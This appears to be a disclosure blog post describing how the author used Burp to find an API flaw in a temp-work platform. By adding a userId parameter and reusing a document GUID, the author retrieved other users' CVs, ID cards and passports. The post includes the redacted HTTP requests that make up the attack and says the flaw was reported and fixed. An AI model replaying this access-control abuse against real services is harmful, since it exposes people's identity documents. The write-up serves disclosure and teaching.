How I managed to find the personal documents of all users due to a misconfigured API

Hey ! Today I will show you how I could manage to retrieve personal identity information (such as passports, IDs, driver licenses) from temporary workers of a well-known platform.

Let’s start

Firstly, I went on Google Play Store and I searched for apps owned by the platform. I came across an APK which was interesting because it has been updated a long time ago :)

So I downloaded the APK, launched BurpSuite and started hacking !

Browsing the APK

I browsed through the APK and I discovered a lot of functionnalities. Indeed, I was able to upload personal documents in my user’s space in order to attest my identity. The first thing I did was to upload a dummy PDF and to log requests using Burp.

Then, I found this request :

POST /API-DOC-UPLOAD/v2.0/searchDocumentsMetaData HTTP/1.1
Host: api-mobile.redacted.com
Authorization: redacted
Ocp-Apim-Subscription-Key: redacted
Application-Header: redacted
Content-Type: application/json; charset=utf-8
Content-Length: 161
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.10.0
Connection: close
 
{"requestSearchDocumentMetadata":{"criteria":{"appId":"ESPACE_PERSO","issueDateStart":"","issueDateEnd":"","buId":"65","type":"UPLOAD_WEB"}}}

This request was made as I was reviewing the documents I had uploaded to the platform. While analyzing the response of it, I noticed an interesting parameter that led to the discovery of an API Mass Assignment vulnerability :

{"responseSearchDocumentsMetadata":{"document":[{"tempGuid":"b5964-...","buId":"65","buIdLabel":"REDACTED","rCreationDate":"2025....","originDocName":"redacted.pdf","edocSubType":"CV","edocType":"redacted","userId":"redacted","issueDate":"","endDate":"","contentSize":0.0,"amount3":null,"workedHours":null}

There was the parameter userId which was very interesting. I tried to add this parameter to the request and resend it :

POST /API-DOC-UPLOAD/v2.0/searchDocumentsMetaData HTTP/1.1
Host: api-mobile.redacted.com
Authorization: redacted
Ocp-Apim-Subscription-Key: redacted
Application-Header: redacted
Content-Type: application/json; charset=utf-8
Content-Length: 161
Accept-Encoding: gzip, deflate
User-Agent: okhttp/4.10.0
Connection: close
 
{"requestSearchDocumentMetadata":{"criteria":{"appId":"ESPACE_PERSO","userId":"redacted","issueDateStart":"","issueDateEnd":"","buId":"65","type":"UPLOAD_WEB"}}}

By changing the ID to another ID, I stumbled upon the metadata of files uploaded by other users…

But that wasn’t all, because I now needed to access the file contents. After going through the application’s features again, I unfortunately couldn’t find any way to do it.

Soooo, I went to their website 👉 https://redacted.com, I signed up and started finding functionnalities and more API endpoints.

While testing, I came across a feature that allowed me to view my CV information by pressing a button, and I recorded the request called:

POST /Api/1/Document/GetByGuid HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: fr-FR,fr;q=0.9
Connection: keep-alive
Content-Length: 88
Cookie: redacted
Host: redacted.com
Origin: redacted.com
Referer: redacted.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
 

[{"tempGuid":"b5964-...","name":"cv.pdf"}]

Then, I saw the response content :

{"name":"cv.pdf","content":"base64content","type":"application/pdf"}

Using the tempGuid obtained from the first request, I was able to retrieve the file’s Base64 content. I created a second account and successfully accessed all the uploaded documents (CV, ID card, passport, etc.).

I reported this vulnerability to the company and they fixed it the same day.